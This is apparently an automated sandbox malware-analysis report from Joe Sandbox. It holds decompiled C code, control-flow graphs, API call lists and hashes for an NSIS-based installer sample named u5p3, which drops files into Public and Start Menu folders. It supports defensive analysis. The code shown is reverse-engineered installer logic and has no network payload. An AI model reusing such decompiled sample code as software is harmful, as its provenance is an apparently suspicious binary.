                                                        0x00000000
                                                        0x00402fc1
                                                        0x00402fc7
                                                        0x00402fd0
                                                        0x00402fd6
                                                        0x00402fd9
                                                        0x00402fdb
                                                        0x00402fe1
                                                        0x00000000
                                                        0x00000000
                                                        0x00402fe7
                                                        0x00402feb
                                                        0x00402ff3
                                                        0x00402ff3
                                                        0x00402ff6
                                                        0x00402ff6
                                                        0x00402ff9
                                                        0x00402ffb
                                                        0x00402ffd
                                                        0x00402ffd
                                                        0x00000000
                                                        0x00402ffb
                                                        0x00402fed
                                                        0x00402ff1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040300f
                                                        0x0040300f
                                                        0x00403015
                                                        0x00403021
                                                        0x00403021
                                                        0x00403024
                                                        0x0040302a
                                                        0x0040302c
                                                        0x0040302c
                                                        0x00403034
                                                        0x00403034
                                                        0x00000000
                                                        0x00403034

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402ED2
                                                        • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                          • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                          • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: "C:\Users\Public\u5p3.bat" $C:\Users\Public$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 4283519449-2486790161
                                                        • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                        • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                        • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                        • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 443 4062bb-4062c2 439->443 441 4064c6-4064d1 440->441 442 4062c7-4062d4 440->442 444 4064d3-4064d7 call 40624c 441->444 445 4064dc-4064dd 441->445 442->441 446 4062da-4062e6 442->446 443->440 444->445 448 4064a7 446->448 449 4062ec-40632a 446->449 450 4064b5-4064b8 448->450 451 4064a9-4064b3 448->451 452 406330-40633b 449->452 453 40644a-40644e 449->453 450->440 451->440 454 406354 452->454 455 40633d-406342 452->455 456 406450-406456 453->456 457 406481-406485 453->457 461 40635b-406362 454->461 455->454 458 406344-406347 455->458 459 406466-406472 call 40624c 456->459 460 406458-406464 call 406193 456->460 462 406494-4064a5 lstrlenW 457->462 463 406487-40648f call 40626e 457->463 458->454 464 406349-40634c 458->464 474 406477-40647d 459->474 460->474 466 406364-406366 461->466 467 406367-406369 461->467 462->440 463->462 464->454 470 40634e-406352 464->470 466->467 472 4063a4-4063a7 467->472 473 40636b-406389 call 40611a 467->473 470->461 477 4063b7-4063ba 472->477 478 4063a9-4063b5 GetSystemDirectoryW 472->478 482 40638e-406392 473->482 474->462 476 40647f 474->476 483 406442-406448 call 4064e0 476->483 480 406425-406427 477->480 481 4063bc-4063ca GetWindowsDirectoryW 477->481 479 406429-40642d 478->479 479->483 488 40642f 479->488 480->479 485 4063cc-4063d6 480->485 481->480 486 406432-406435 482->486 487 406398-40639f call 40626e 482->487 483->462 490 4063f0-406406 SHGetSpecialFolderLocation 485->490 491 4063d8-4063db 485->491 486->483 493 406437-40643d lstrcatW 486->493 487->479 488->486 495 406421 490->495 496 406408-40641f SHGetPathFromIDListW CoTaskMemFree 490->496 491->490 494 4063dd-4063e4 491->494 493->483 498 4063ec-4063ee 494->498 495->480 496->479 496->495 498->479 498->490
                                                        C-Code - Quality: 72%
                                                        			E0040626E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x4291dc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a258 + _t43 * 2;
				_t44 = 0x4281a0;
				_t110 = 0x4281a0;
				if(_a4 >= 0x4281a0 && _a4 - 0x4281a0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E0040626E(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4281a0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040624C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406193(_t110,  *0x42a208);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064E0(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a20c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a2a4;
						if( *0x42a2a4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a204;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a208,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a208,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040611A( *0x42a258, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E0040626E(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040624C(_a4, _t44);
			}






























                                                        0x0040626e
                                                        0x0040626e
                                                        0x0040626e
                                                        0x00406274
                                                        0x00406279
                                                        0x0040628a
                                                        0x0040628a
                                                        0x00406292
                                                        0x00406293
                                                        0x00406294
                                                        0x00406295
                                                        0x00406298
                                                        0x004062a0
                                                        0x004062a2
                                                        0x004062bb
                                                        0x004062be
                                                        0x004062be
                                                        0x004064ba
                                                        0x004064ba
                                                        0x004064c0
                                                        0x00000000
                                                        0x00000000
                                                        0x004062ce
                                                        0x004062d4
                                                        0x00000000
                                                        0x00000000
                                                        0x004062dc
                                                        0x004062dd
                                                        0x004062df
                                                        0x004062e3
                                                        0x004062e6
                                                        0x004064a7
                                                        0x004064b5
                                                        0x004064b8
                                                        0x004064b8
                                                        0x004064a9
                                                        0x004064ac
                                                        0x004064af
                                                        0x004064b1
                                                        0x004064b1
                                                        0x00000000
                                                        0x004064a7
                                                        0x004062ec
                                                        0x004062ef
                                                        0x004062fe
                                                        0x00406305
                                                        0x0040630f
                                                        0x00406313
                                                        0x00406316
                                                        0x00406319
                                                        0x0040631e
                                                        0x00406323
                                                        0x00406327
                                                        0x0040632a
                                                        0x0040644a
                                                        0x0040644e
                                                        0x00406481
                                                        0x00406485
                                                        0x0040648a
                                                        0x0040648f
                                                        0x0040648f
                                                        0x00406494
                                                        0x00406495
                                                        0x0040649a
                                                        0x0040649d
                                                        0x004064a0
                                                        0x00000000
                                                        0x004064a0
                                                        0x00406450
                                                        0x00406453
                                                        0x00406456
                                                        0x0040646b
                                                        0x00406472
                                                        0x00406458
                                                        0x0040645f
                                                        0x0040645f
                                                        0x0040647a
                                                        0x0040647d
                                                        0x00406442
                                                        0x00406443
                                                        0x00406443
                                                        0x00000000
                                                        0x0040647d
                                                        0x00406330
                                                        0x00406338
                                                        0x0040633a
                                                        0x0040633b
                                                        0x00406354
                                                        0x00406354
                                                        0x0040635b
                                                        0x0040635b
                                                        0x00406362
                                                        0x00406366
                                                        0x00406366
                                                        0x00406367
                                                        0x00406369
                                                        0x004063a4
                                                        0x004063a7
                                                        0x004063b7
                                                        0x004063ba
                                                        0x004063c2
                                                        0x004063c8
                                                        0x004063c8
                                                        0x00406425
                                                        0x00406425
                                                        0x00406427
                                                        0x00000000
                                                        0x00000000
                                                        0x004063cc
                                                        0x004063d3
                                                        0x004063d4
                                                        0x004063d6
                                                        0x004063f0
                                                        0x004063fe
                                                        0x00406404
                                                        0x00406406
                                                        0x00406421
                                                        0x00406421
                                                        0x00406421
                                                        0x00000000
                                                        0x00406421
                                                        0x0040640c
                                                        0x00406417
                                                        0x0040641d
                                                        0x0040641f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040641f
                                                        0x004063d8
                                                        0x004063db
                                                        0x00000000
                                                        0x00000000
                                                        0x004063ea
                                                        0x004063ec
                                                        0x004063ee
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004063ee
                                                        0x00000000
                                                        0x00406425
                                                        0x004063af
                                                        0x00000000
                                                        0x0040636b
                                                        0x00406389
                                                        0x0040638e
                                                        0x00406392
                                                        0x00406432
                                                        0x00406432
                                                        0x00406435
                                                        0x0040643d
                                                        0x0040643d
                                                        0x00000000
                                                        0x00406435
                                                        0x0040639a
                                                        0x00406429
                                                        0x00406429
                                                        0x0040642d
                                                        0x00000000
                                                        0x00000000
                                                        0x0040642f
                                                        0x00000000
                                                        0x0040642f
                                                        0x00406369
                                                        0x0040633d
                                                        0x00406342
                                                        0x00000000
                                                        0x00000000
                                                        0x00406344
                                                        0x00406347
                                                        0x00000000
                                                        0x00000000
                                                        0x00406349
                                                        0x0040634c
                                                        0x00000000
                                                        0x0040634e
                                                        0x0040634e
                                                        0x00000000
                                                        0x0040634e
                                                        0x0040634c
                                                        0x004064c6
                                                        0x004064d1
                                                        0x004064dd
                                                        0x004064dd
                                                        0x00000000

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000400), ref: 004063AF
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000400,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,004052E7,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 004063C2
                                                        • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,004052E7,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 004063FE
                                                        • SHGetPathFromIDListW.SHELL32(00410EA0,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040640C
                                                        • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,004052E7,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 00406495
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 717251189-1819230207
                                                        • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                        • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                        • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                        • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        C-Code - Quality: 61%
                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405B94( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Ancone";
				if(_t35 == 0) {
					lstrcatW(E00405B1D(E0040624C(_t84, L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth")), ??);
				} else {
					E0040624C();
				}
				E004064E0(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040658F(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D19(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D3E(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052B0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E0040624C("Finishs", _t81);
						E0040624C(_t81, _t84);
						E0040626E(_t77, _t81, _t84, "C:\Users\jones\AppData\Roaming\Microsoft\Windows",  *((intOrPtr*)(_t86 - 0x14)));
						E0040624C(_t81, "Finishs");
						_t64 = E004058AE("C:\Users\jones\AppData\Roaming\Microsoft\Windows",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052B0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052B0(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058AE();
					goto L29;
				}
				goto L33;
			}


















                                                        0x0040176f
                                                        0x00401776
                                                        0x00401782
                                                        0x00401785
                                                        0x0040178a
                                                        0x0040178d
                                                        0x00401794
                                                        0x004017b0
                                                        0x00401796
                                                        0x00401797
                                                        0x00401797
                                                        0x004017b6
                                                        0x004017bb
                                                        0x004017bb
                                                        0x004017bf
                                                        0x004017c2
                                                        0x004017c7
                                                        0x004017c9
                                                        0x004017cb
                                                        0x004017d0
                                                        0x004017d0
                                                        0x004017db
                                                        0x004017db
                                                        0x004017ec
                                                        0x004017ee
                                                        0x004017ee
                                                        0x004017ef
                                                        0x004017ef
                                                        0x004017f2
                                                        0x004017f5
                                                        0x004017f8
                                                        0x004017f8
                                                        0x004017ff
                                                        0x0040180e
                                                        0x00401813
                                                        0x00401816
                                                        0x00401819
                                                        0x00000000
                                                        0x00000000
                                                        0x0040181b
                                                        0x0040181e
                                                        0x00401874
                                                        0x00401879
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00402abf
                                                        0x00402ac2
                                                        0x00402ac2
                                                        0x00000000
                                                        0x00401820
                                                        0x00401826
                                                        0x0040182d
                                                        0x0040183a
                                                        0x00401845
                                                        0x0040185b
                                                        0x0040185b
                                                        0x0040185e
                                                        0x00000000
                                                        0x00401864
                                                        0x00401864
                                                        0x00401865
                                                        0x00401882
                                                        0x00402ac8
                                                        0x00402ac8
                                                        0x00402ac8
                                                        0x00401867
                                                        0x00401867
                                                        0x00401868
                                                        0x00401493
                                                        0x004022f1
                                                        0x004022f1
                                                        0x004022f1
                                                        0x00401865
                                                        0x0040185e
                                                        0x00402aca
                                                        0x00402ace
                                                        0x00402ace
                                                        0x00401892
                                                        0x00401897
                                                        0x0040189d
                                                        0x0040189e
                                                        0x0040189f
                                                        0x004018a2
                                                        0x004018a5
                                                        0x004018aa
                                                        0x004018b0
                                                        0x004018b4
                                                        0x004018b6
                                                        0x004018be
                                                        0x004018ca
                                                        0x004018b8
                                                        0x004018b8
                                                        0x004018bc
                                                        0x00000000
                                                        0x00000000
                                                        0x004018bc
                                                        0x004018d3
                                                        0x004018d9
                                                        0x004018db
                                                        0x00000000
                                                        0x004018e1
                                                        0x004018e1
                                                        0x004018e4
                                                        0x004018fc
                                                        0x004018e6
                                                        0x004018e9
                                                        0x004018f2
                                                        0x004018f2
                                                        0x00401901
                                                        0x00401906
                                                        0x004022ec
                                                        0x00000000
                                                        0x004022ec
                                                        0x00000000

                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                        • CompareFileTime.KERNEL32(-00000014,?,Ancone,Ancone,00000000,00000000,Ancone,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,?,00000031), ref: 004017D5
                                                          • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • Part of subcall function 004052B0: lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                          • Part of subcall function 004052B0: SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
